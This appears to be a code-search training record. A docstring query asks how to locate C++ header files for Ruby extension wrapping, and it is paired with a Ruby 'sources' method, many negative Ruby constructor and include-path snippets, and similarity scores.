"def initialize(name=:spec)\n @name = name\n @libs = [\"lib\"]\n @pattern = nil\n @options = nil\n @spec_files = nil\n @spec_opts = []\n @warning = false\n @rcov = false\n @ruby_opts = []\n @out = nil\n @fail_on_error = true\n yield self if block_given?\n @pattern = 'spec/**/*_spec.rb' if @pattern.nil? && @spec_files.nil?\n define\n end",
"def initialize ( myname = \"Ruby\" )\n @name = myname\n end",
"def initialize(name)\n \n @name = name\n end",
"def initialize(name, parser, &block)\n @name = name\n @parser = parser\n @modules = []\n @wrapped_functions = []\n @wrapped_classes = []\n @wrapped_structs = []\n\n block.call(self) if block\n end",
"def initialize(name)\n @name = name\n load \n end",
"def initialize(name)\n self.name = name\n end",
"def initialize(name = nil, version = nil)\n super()\n @gems_dir = nil\n @base_dir = nil\n @loaded = false\n @activated = false\n @loaded_from = nil\n @original_platform = nil\n @installed_by_version = nil\n\n set_nil_attributes_to_nil\n set_not_nil_attributes_to_default_values\n\n @new_platform = Gem::Platform::RUBY\n\n self.name = name if name\n self.version = version if version\n\n if platform = Gem.platforms.last and platform != Gem::Platform::RUBY and platform != Gem::Platform.local\n self.platform = platform\n end\n\n yield self if block_given?\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n m.parent = self\n @modules << m\n end",
"def initialize(name)\n self.name = name\n end",
"def initialize( name = nil, version = nil )\n @name = name\n @version = version\n @install_commands = []\n @build_commands = []\n yield self if block_given?\n @upstream_source = URI.parse( @upstream_source )\n define unless name.nil? or version.nil?\n end",
"def initialize(name, data)\n @name = name\n @extname = File.extname(name)\n @_data = data\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n # Check and set the name\n @name = name.to_sym\n\n # Initialize the internals of the pipeline.\n\n\n # Initialize the environment for building the pipeline\n\n # The stages\n @stages = []\n\n # The event synchronizing the pipeline\n @mk_ev = proc { $clk.posedge }\n\n # The reset\n @mk_rst = proc { $rst }\n\n # Creates the namespace to execute the pipeline block in.\n @namespace = Namespace.new(self)\n\n # Generates the function for setting up the pipeline.\n obj = self # For using the right self within the proc\n HDLRuby::High.space_reg(@name) do |&ruby_block|\n if ruby_block then\n # Builds the pipeline.\n obj.build(&ruby_block)\n else\n # Return the pipeline as is.\n return obj\n end\n end\n\n end",
"def initialize(name=:js_build)\n @name = name\n @description = \"Building/Concatenating the JS files\"\n @pattern = '*.js'\n @deps = []\n @outdir = \".\"\n @inputdirs = []\n\n # don't look here!\n @file_list = []\n\n yield self if block_given?\n define\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name=:spec)\n @name = name\n @libs = [File.expand_path(File.dirname(__FILE__) + '/../../../lib')]\n @pattern = nil\n @spec_files = nil\n @spec_opts = []\n @warning = false\n @ruby_opts = []\n @fail_on_error = true\n @rcov = false\n @rcov_opts = ['--exclude', 'lib\\/spec,bin\\/spec,config\\/boot.rb']\n @rcov_dir = \"coverage\"\n\n yield self if block_given?\n @pattern = 'spec/**/*_spec.rb' if pattern.nil? && spec_files.nil?\n define\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\r\n @name = name\r\n end",
"def initialize(name)\r\n @name = name\r\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name = '')\n self.name = name\n end",
"def initialize(name)\n @name = name\n \n end",
"def initialize(namespace_name = nil, &block)\n if block_given?\n instance_eval(&block)\n else\n raise ArgumentError if namespace_name.nil?\n\n self.name = namespace_name\n end\n end",
"def initialize(name, options = {})\n runtime = defined?(Runtime) ? Runtime : {}\n \n options = {\n :parent => runtime['Object'], \n :is_ghost => false, \n :is_module => false\n }.update(options)\n \n @name = name\n @runtime_methods = {}\n @parent = options[:parent]\n @is_ghost = options[:is_ghost]\n @is_module = options[:is_module]\n \n # Check if we're bootstrapping (launching the runtime). During this process the \n # runtime is not fully initialized and core classes do not yet exists, so we defer \n # using those once the language is bootstrapped.\n # This solves the chicken-or-the-egg problem with the Class class. We can \n # initialize Class then set Class.class = Class.\n runtime_class = runtime['Class']\n \n super runtime_class\n \n # Create the ghost class (if not already a ghost), deriving it from the ghost class of the current class's parent.\n # This will allow for the inheritance of the so called \"class\" methods.\n singleton_class(options[:parent].singleton_class) if !options[:is_ghost] && runtime_class\n end",
"def initialize(name)\n VAPI::Util.check_type(self, 'name', name, String)\n self.name = name\n end",
"def initialize(name)\n @name = name #has a name\n @@all << self\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize(name)\n @name = name\n end",
"def initialize name\n @name = name\n end",
"def define_constructor(name)\n return false if not self::CONVERSIONS[name.to_sym]\n self.class.instance_exec do\n define_method( name.to_sym ) do | *args |\n new( args[ 0 ].to_f * self::CONVERSIONS[ name ] )\n end\n end\n end",
"def initialize(*argv, &argb)\n @name = ''\n if name = argv.find {|arg| arg.is_a?(String) }\n @name = name\n end\n fyx_initialize_save_name(*argv, &argb)\n end",
"def initialize(name)\n @name = name\n raise ArgumentError, \"No name present\" if name.empty?\n end"
] |
[
"0.6536697",
"0.64527035",
"0.6447034",
"0.6431908",
"0.63207275",
"0.6304655",
"0.62451303",
"0.62451303",
"0.62451303",
"0.6201769",
"0.6179208",
"0.61736387",
"0.61668783",
"0.61409473",
"0.6065675",
"0.60537136",
"0.60520977",
"0.60520977",
"0.5981832",
"0.59575945",
"0.5933919",
"0.592173",
"0.59197116",
"0.59119743",
"0.5908881",
"0.5904897",
"0.58922625",
"0.5869694",
"0.5868423",
"0.58641446",
"0.5857986",
"0.5829412",
"0.58256906",
"0.58144",
"0.5814365",
"0.57966983",
"0.57922554",
"0.57903504",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57832634",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57488626",
"0.57392466",
"0.5693393",
"0.56924003",
"0.5671499",
"0.56562746",
"0.5654003",
"0.5654003",
"0.5653579",
"0.5652964",
"0.5637684",
"0.5635255",
"0.5620698",
"0.5610901",
"0.56004924",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.5599293",
"0.55946636",
"0.5594631",
"0.5594192",
"0.55748516"
] |
0.58629173
|
30
|
Define where we can find the header files to parse Can give an array of directories, a glob, or just a string. All file names should be full paths, not relative. Options can be any or all of the following: :include_paths Path(s) to be added as I flags :library_paths Path(s) to be added as L flags :libraries Path(s) to be added as l flags :cxxflags Flag(s) to be added to command line for parsing / compiling :ldflags Flag(s) to be added to command line for linking :includes Header file(s) to include at the beginning of each .rb.cpp file generated. :include_source_files C++ source files that need to be compiled into the extension but not wrapped. :include_source_dir A combination option for reducing duplication, this option will query the given directory for source files, adding all to :include_source_files and adding all h/hpp files to :includes
|
def sources(dirs, options = {})
parser_options = {
:includes => [],
:cxxflags => [
# Force castxml into C++ mode
"-x c++",
# Allow things like `<::`
"-fpermissive"
]
}
if (code_dir = options.delete(:include_source_dir))
options[:include_source_files] ||= []
options[:includes] ||= []
Dir["#{code_dir}/*"].each do |f|
next if File.directory?(f)
options[:include_source_files] << f
end
end
if (paths = options.delete(:include_paths))
@options[:include_paths] << paths
parser_options[:includes] << paths
end
if (lib_paths = options.delete(:library_paths))
@options[:library_paths] << lib_paths
end
if (libs = options.delete(:libraries))
@options[:libraries] << libs
end
if (flags = options.delete(:cxxflags))
@options[:cxxflags] << flags
parser_options[:cxxflags] << flags
end
if (flags = options.delete(:ldflags))
@options[:ldflags] << flags
end
if (files = options.delete(:include_source_files))
@options[:include_source_files] << files
options[:includes] ||= []
[files].flatten.each do |f|
options[:includes] << f if File.extname(f) =~ /hpp/i || File.extname(f) =~ /h/i
end
end
if (flags = options.delete(:includes))
includes = Dir.glob(flags)
if(includes.length == 0)
puts "Warning: There were no matches for includes #{flags.inspect}"
else
@options[:includes] += [*includes]
end
end
@options[:includes] += [*dirs]
@sources = Dir.glob dirs
Logger.info "Parsing #{@sources.inspect}"
@parser = RbGCCXML.parse(dirs, parser_options)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def header_include_paths\n cmd = RbConfig::MAKEFILE_CONFIG[\"CC\"]\n args = %w{-Wp,-v -xc /dev/null -fsyntax-only}\n paths = []\n reading_paths = false\n run_command(cmd, *args) do |line|\n line.chomp!\n if reading_paths\n if line == 'End of search list.'\n reading_paths = false\n elsif line.match(/\\A /)\n line.strip!\n line.sub!(/\\s+\\(framework directory\\)\\Z/, '')\n paths << line\n end\n elsif line == '#include <...> search starts here:'\n reading_paths = true\n end\n end\n paths\nend",
"def header_files\n source_files(HPP_EXTENSIONS)\n end",
"def cpp_headers( cpp, inc_dirs )\n headers = []\n\n p = Pathname.new( cpp )\n path_prefix = p.dirname.to_s + \"/\"\n # print path_prefix, \"\\n\"\n cpp_file = File.new( cpp, \"r\" )\n cpp_file.each do |line|\n # print line\n inc = line.match( /#include +\"([\\w]+\\.h)\"/ )\n if ( ! inc.nil? )\n # inc_path = path_prefix + inc[1]\n inc_path = header_path( inc[1], inc_dirs )\n if not inc_path.nil?\n # print inc_path, \"\\n\"\n headers << inc_path\n end\n end\n end\n return headers\nend",
"def parse(argv)\n accessors = []\n\n opts = OptionParser.new do |opt|\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n - Darkfish is an improved, frameless HTML output by Michael Granger.\n\n - HTML output is normally produced into a number of separate files\n (one per class, module, and file, along with various indices).\n These files will appear in the directory given by the --op\n option (doc/ by default).\n\n - XML output by default is written to standard output. If a\n --opname option is given, the output will instead be written\n to a file with that name in the output directory.\n\n - .chm files (Windows help files) are written in the --op directory.\n If an --opname parameter is present, that name is used, otherwise\n the file will be called rdoc.chm.\n EOF\n\n opt.separator nil\n opt.separator \"Options:\"\n opt.separator nil\n\n opt.on(\"--accessor=ACCESSORS\", \"-A\", Array,\n \"A comma separated list of additional class\",\n \"methods that should be treated like\",\n \"'attr_reader' and friends.\",\n \" \",\n \"Option may be repeated.\",\n \" \",\n \"Each accessorname may have '=text'\",\n \"appended, in which case that text appears\",\n \"where the r/w/rw appears for normal.\",\n \"accessors\") do |value|\n value.each do |accessor|\n if accessor =~ /^(\\w+)(=(.*))?$/\n accessors << $1\n @extra_accessor_flags[$1] = $3\n end\n end\n end\n\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Include all methods (not just public) in\",\n \"the output.\") do |value|\n @show_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n opt.on(\"--debug\", \"-D\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.separator nil\n\n opt.on(\"--diagram\", \"-d\",\n \"Generate diagrams showing modules and\",\n \"classes. You need dot V1.8.6 or later to\",\n \"use the --diagram option correctly. Dot is\",\n \"available from http://graphviz.org\") do |value|\n check_diagram\n @diagram = true\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::ParserFactory.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--fileboxes\", \"-F\",\n \"Classes are put in boxes which represents\",\n \"files, where these classes reside. Classes\",\n \"shared between more than one file are\",\n \"shown with list of files that are sharing\",\n \"them. Silently discarded if --diagram is\",\n \"not given.\") do |value|\n @fileboxes = value\n end\n\n opt.separator nil\n\n opt.on(\"--force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"--fmt=FORMAT\", \"--format=FORMAT\", \"-f\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n image_formats = %w[gif png jpg jpeg]\n opt.on(\"--image-format=FORMAT\", \"-I\", image_formats,\n \"Sets output image format for diagrams. Can\",\n \"be #{image_formats.join ', '}. If this option\",\n \"is omitted, png is used. Requires\",\n \"diagrams.\") do |value|\n @image_format = value\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", Array,\n \"set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--inline-source\", \"-S\",\n \"Show method source code inline, rather than\",\n \"via a popup link.\") do |value|\n @inline_source = value\n end\n\n opt.separator nil\n\n opt.on(\"--line-numbers\", \"-N\",\n \"Include line numbers in the source code.\") do |value|\n @include_line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--merge\", \"-M\",\n \"When creating ri output, merge previously\",\n \"processed classes into previously\",\n \"documented classes of the same name.\") do |value|\n @merge = value\n end\n\n opt.separator nil\n\n opt.on(\"--one-file\", \"-1\",\n \"Put all the output into a single file.\") do |value|\n @all_one_file = value\n @inline_source = value if value\n @template = 'one_page_html'\n end\n\n opt.separator nil\n\n opt.on(\"--op=DIR\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--opname=NAME\", \"-n\",\n \"Set the NAME of the output. Has no effect\",\n \"for HTML.\") do |value|\n @op_name = value\n end\n\n opt.separator nil\n\n opt.on(\"--promiscuous\", \"-p\",\n \"When documenting a file that contains a\",\n \"module or class also defined in other\",\n \"files, show all stuff for that module or\",\n \"class in each files page. By default, only\",\n \"show stuff defined in that particular file.\") do |value|\n @promiscuous = value\n end\n\n opt.separator nil\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.on(\"--verbose\", \"-v\",\n \"Display extra progress as we parse.\") do |value|\n @verbosity = 2\n end\n\n\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SITEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-system\", \"-Y\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed. This\",\n \"option is intended to be used during Ruby\",\n \"installation.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SYSDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--style=URL\", \"-s\",\n \"Specifies the URL of a separate stylesheet.\") do |value|\n @css = value\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", OptionParser::DecimalInteger,\n \"Set the width of tab characters.\") do |value|\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\",\n \"Set the template used when generating\",\n \"output.\") do |value|\n @template = value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n end\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts.parse! argv\n\n @files = argv.dup\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n\n if @exclude.empty? then\n @exclude = nil\n else\n @exclude = Regexp.new(@exclude.join(\"|\"))\n end\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n @template ||= @generator_name\n\n # Generate a regexp from the accessors\n unless accessors.empty? then\n re = '^(' + accessors.map { |a| Regexp.quote a }.join('|') + ')$'\n @extra_accessors = Regexp.new re\n end\n\n rescue OptionParser::InvalidArgument, OptionParser::InvalidOption => e\n puts opts\n puts\n puts e\n exit 1\n end",
"def find_includes include_dirs, src\r\n includes = Rake::CParser.parse_file_includes src\r\n res = includes.collect { |inc|\r\n search_includes include_dirs, src, inc\r\n }\r\n res.compact\r\n end",
"def get_sources(filepath)\n content = File.read(filepath, mode: 'r')\n headers = content.scan(/^#include\\ \\\"(.*?)\\\"/m).map { |header| header[0] }\n file_dir = File.dirname(filepath)\n result = headers.map do |header|\n source = File.path(\"#{file_dir}/#{header.gsub(/.h$/, '.cpp')}\")\n raise \"File #{source} does not exist\" unless File.exist? source\n\n source\n end.to_set\n result + headers.map do |header|\n File.path \"#{file_dir}/#{header}\"\n end\nend",
"def includes(*args)\n @options[:include] ||= []\n @options[:include] |= args\n end",
"def includes(*paths)\n self.included_files.concat(expand_globs(paths))\n end",
"def include_args(aux_libraries)\n all_aux_include_dirs = arduino_library_src_dirs(aux_libraries)\n places = [ARDUINO_HEADER_DIR, UNITTEST_HEADER_DIR] + header_dirs + all_aux_include_dirs\n places.map { |d| \"-I#{d}\" }\n end",
"def initialize(options={})\n @bundle = Set[]\n @include_dirs = Set[]\n @require_paths = Set[]\n @require_globs = Set[]\n\n if options[:include]\n options[:include].each do |dir|\n @include_dirs << File.expand_path(dir)\n end\n end\n\n case options[:bundle]\n when String, Symbol\n @bundle << options[:bundle].to_sym\n when Enumerable\n options[:bundle].each do |group|\n @bundle << group.to_sym\n end\n when true\n @bundle << :default\n end\n\n if options[:require]\n @require_paths += options[:require]\n end\n\n if options[:require_all]\n @require_globs += options[:require_all]\n end\n end",
"def initialize(input = [\"{lib,app}/**/*.rb\", \"ext/**/*.c\"], output = \"doc/json\", options = {})\n @input = input\n @output = output\n @options = options\n end",
"def cpp_includes\n\t\tselect {|x| x.class == CppInclude }\n\tend",
"def parse(argv)\n opts = OptionParser.new do |opt|\n opt.program_name = File.basename $0\n opt.version = RDoc::VERSION\n opt.release = nil\n opt.summary_indent = ' ' * 4\n opt.banner = <<-EOF\nUsage: #{opt.program_name} [options] [names...]\n\n Files are parsed, and the information they contain collected, before any\n output is produced. This allows cross references between all files to be\n resolved. If a name is a directory, it is traversed. If no names are\n specified, all Ruby files in the current directory (and subdirectories) are\n processed.\n\n How RDoc generates output depends on the output formatter being used, and on\n the options you give.\n\n - Darkfish creates frameless HTML output by Michael Granger.\n\n - ri creates ri data files\n EOF\n\n opt.separator nil\n opt.separator \"Parsing Options:\"\n opt.separator nil\n\n opt.on(\"--all\", \"-a\",\n \"Include all methods (not just public) in\",\n \"the output.\") do |value|\n @show_all = value\n end\n\n opt.separator nil\n\n opt.on(\"--exclude=PATTERN\", \"-x\", Regexp,\n \"Do not process files or directories\",\n \"matching PATTERN.\") do |value|\n @exclude << value\n end\n\n opt.separator nil\n\n opt.on(\"--extension=NEW=OLD\", \"-E\",\n \"Treat files ending with .new as if they\",\n \"ended with .old. Using '-E cgi=rb' will\",\n \"cause xxx.cgi to be parsed as a Ruby file.\") do |value|\n new, old = value.split(/=/, 2)\n\n unless new and old then\n raise OptionParser::InvalidArgument, \"Invalid parameter to '-E'\"\n end\n\n unless RDoc::ParserFactory.alias_extension old, new then\n raise OptionParser::InvalidArgument, \"Unknown extension .#{old} to -E\"\n end\n end\n\n opt.separator nil\n\n opt.on(\"--force-update\", \"-U\",\n \"Forces rdoc to scan all sources even if\",\n \"newer than the flag file.\") do |value|\n @force_update = value\n end\n\n opt.separator nil\n\n opt.on(\"--pipe\",\n \"Convert RDoc on stdin to HTML\") do\n @pipe = true\n end\n\n opt.separator nil\n\n opt.on(\"--threads=THREADS\", Integer,\n \"Number of threads to parse with.\") do |threads|\n @threads = threads\n end\n\n opt.separator nil\n opt.separator \"Generator Options:\"\n opt.separator nil\n\n opt.on(\"--charset=CHARSET\", \"-c\",\n \"Specifies the output HTML character-set.\") do |value|\n @charset = value\n end\n\n opt.separator nil\n\n generator_text = @generators.keys.map { |name| \" #{name}\" }.sort\n\n opt.on(\"--fmt=FORMAT\", \"--format=FORMAT\", \"-f\", @generators.keys,\n \"Set the output formatter. One of:\", *generator_text) do |value|\n @generator_name = value.downcase\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--include=DIRECTORIES\", \"-i\", Array,\n \"Set (or add to) the list of directories to\",\n \"be searched when satisfying :include:\",\n \"requests. Can be used more than once.\") do |value|\n @rdoc_include.concat value.map { |dir| dir.strip }\n end\n\n opt.separator nil\n\n opt.on(\"--line-numbers\", \"-N\",\n \"Include line numbers in the source code.\") do |value|\n @include_line_numbers = value\n end\n\n opt.separator nil\n\n opt.on(\"--main=NAME\", \"-m\",\n \"NAME will be the initial page displayed.\") do |value|\n @main_page = value\n end\n\n opt.separator nil\n\n opt.on(\"--output=DIR\", \"--op\", \"-o\",\n \"Set the output directory.\") do |value|\n @op_dir = value\n end\n\n opt.separator nil\n\n opt.on(\"--show-hash\", \"-H\",\n \"A name of the form #name in a comment is a\",\n \"possible hyperlink to an instance method\",\n \"name. When displayed, the '#' is removed\",\n \"unless this option is specified.\") do |value|\n @show_hash = value\n end\n\n opt.separator nil\n\n opt.on(\"--open-source\", \"-s\",\n \"Include source code to your documentation\") do |value|\n @open_source = value\n end\n\n opt.separator nil\n\n opt.on(\"--tab-width=WIDTH\", \"-w\", OptionParser::DecimalInteger,\n \"Set the width of tab characters.\") do |value|\n @tab_width = value\n end\n\n opt.separator nil\n\n opt.on(\"--template=NAME\", \"-T\",\n \"Set the template used when generating\",\n \"output.\") do |value|\n @template = value\n end\n\n opt.separator nil\n\n opt.on(\"--title=TITLE\", \"-t\",\n \"Set TITLE as the title for HTML output.\") do |value|\n @title = value\n end\n\n opt.separator nil\n\n opt.on(\"--webcvs=URL\", \"-W\",\n \"Specify a URL for linking to a web frontend\",\n \"to CVS. If the URL contains a '\\%s', the\",\n \"name of the current file will be\",\n \"substituted; if the URL doesn't contain a\",\n \"'\\%s', the filename will be appended to it.\") do |value|\n @webcvs = value\n end\n\n opt.separator nil\n opt.separator \"Diagram Options:\"\n opt.separator nil\n\n image_formats = %w[gif png jpg jpeg]\n opt.on(\"--image-format=FORMAT\", \"-I\", image_formats,\n \"Sets output image format for diagrams. Can\",\n \"be #{image_formats.join ', '}. If this option\",\n \"is omitted, png is used. Requires\",\n \"diagrams.\") do |value|\n @image_format = value\n end\n\n opt.separator nil\n\n opt.on(\"--diagram\", \"-d\",\n \"Generate diagrams showing modules and\",\n \"classes. You need dot V1.8.6 or later to\",\n \"use the --diagram option correctly. Dot is\",\n \"available from http://graphviz.org\") do |value|\n check_diagram\n @diagram = true\n end\n\n opt.separator nil\n\n opt.on(\"--fileboxes\", \"-F\",\n \"Classes are put in boxes which represents\",\n \"files, where these classes reside. Classes\",\n \"shared between more than one file are\",\n \"shown with list of files that are sharing\",\n \"them. Silently discarded if --diagram is\",\n \"not given.\") do |value|\n @fileboxes = value\n end\n\n opt.separator nil\n opt.separator \"ri Generator Options:\"\n opt.separator nil\n\n opt.on(\"--ri\", \"-r\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in the '.rdoc' directory under\",\n \"your home directory unless overridden by a\",\n \"subsequent --op parameter, so no special\",\n \"privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::HOMEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--ri-site\", \"-R\",\n \"Generate output for use by `ri`. The files\",\n \"are stored in a site-wide directory,\",\n \"making them accessible to others, so\",\n \"special privileges are needed.\") do |value|\n @generator_name = \"ri\"\n @op_dir = RDoc::RI::Paths::SITEDIR\n setup_generator\n end\n\n opt.separator nil\n\n opt.on(\"--merge\", \"-M\",\n \"When creating ri output, merge previously\",\n \"processed classes into previously\",\n \"documented classes of the same name.\") do |value|\n @merge = value\n end\n\n opt.separator nil\n opt.separator \"Generic Options:\"\n opt.separator nil\n\n opt.on(\"--debug\", \"-D\",\n \"Displays lots on internal stuff.\") do |value|\n $DEBUG_RDOC = value\n end\n\n opt.on(\"--quiet\", \"-q\",\n \"Don't show progress as we parse.\") do |value|\n @verbosity = 0\n end\n\n opt.on(\"--verbose\", \"-v\",\n \"Display extra progress as we parse.\") do |value|\n @verbosity = 2\n end\n\n opt.separator nil\n opt.separator 'Deprecated options - these warn when set'\n opt.separator nil\n\n opt.on(\"--inline-source\", \"-S\") do |value|\n warn \"--inline-source will be removed from RDoc on or after August 2009\"\n end\n\n opt.on(\"--promiscuous\", \"-p\") do |value|\n warn \"--promiscuous will be removed from RDoc on or after August 2009\"\n end\n\n opt.separator nil\n end\n\n argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT']\n\n opts.parse! argv\n\n @files = argv.dup\n\n @rdoc_include << \".\" if @rdoc_include.empty?\n\n if @exclude.empty? then\n @exclude = nil\n else\n @exclude = Regexp.new(@exclude.join(\"|\"))\n end\n\n check_files\n\n # If no template was specified, use the default template for the output\n # formatter\n\n @template ||= @generator_name\n\n rescue OptionParser::InvalidArgument, OptionParser::InvalidOption => e\n puts opts\n puts\n puts e\n exit 1\n end",
"def includedirs\n res = []\n @flags.each { |f| res.push f if f =~ /^-I/ }\n res.join \" \"\n end",
"def append_header_search_path(target, *paths)\n setting = 'HEADER_SEARCH_PATHS'\n target.build_configurations.each do |config|\n config.build_settings[setting] ||= '$(inherited)'\n paths.each do |path|\n config.build_settings[setting] << ' '\n config.build_settings[setting] << path\n end\n end\nend",
"def include_path\n @include_paths.map { |p| \"-I#{ p }\" }.join( \" \" )\n end",
"def scanHeaderFile file_param\n\n\tif file_param == nil then return end\n\n\tno_ending = file_param.split(\".\")\n\t$Objects.push(no_ending[0])\n\tf = File.open(file_param,\"r\").each_line { |line| \n\n\t\tline.scan(/^#include \"(.+)\"$/) do |w|\n\t\t\t$files_to_do.push(w)\n\t\tend\n\t}\n\n\t$files_to_do.flatten!\n\t$Objects.each do |word|\n\t\t$files_to_do.reject! {|repeat| repeat.split(\".\")[0] == word}\n\tend\n\n\tif $files_to_do != nil then\n\t\t$files_to_do.uniq!\n\t\tscanHeaderFile $files_to_do.pop\n\tend\nend",
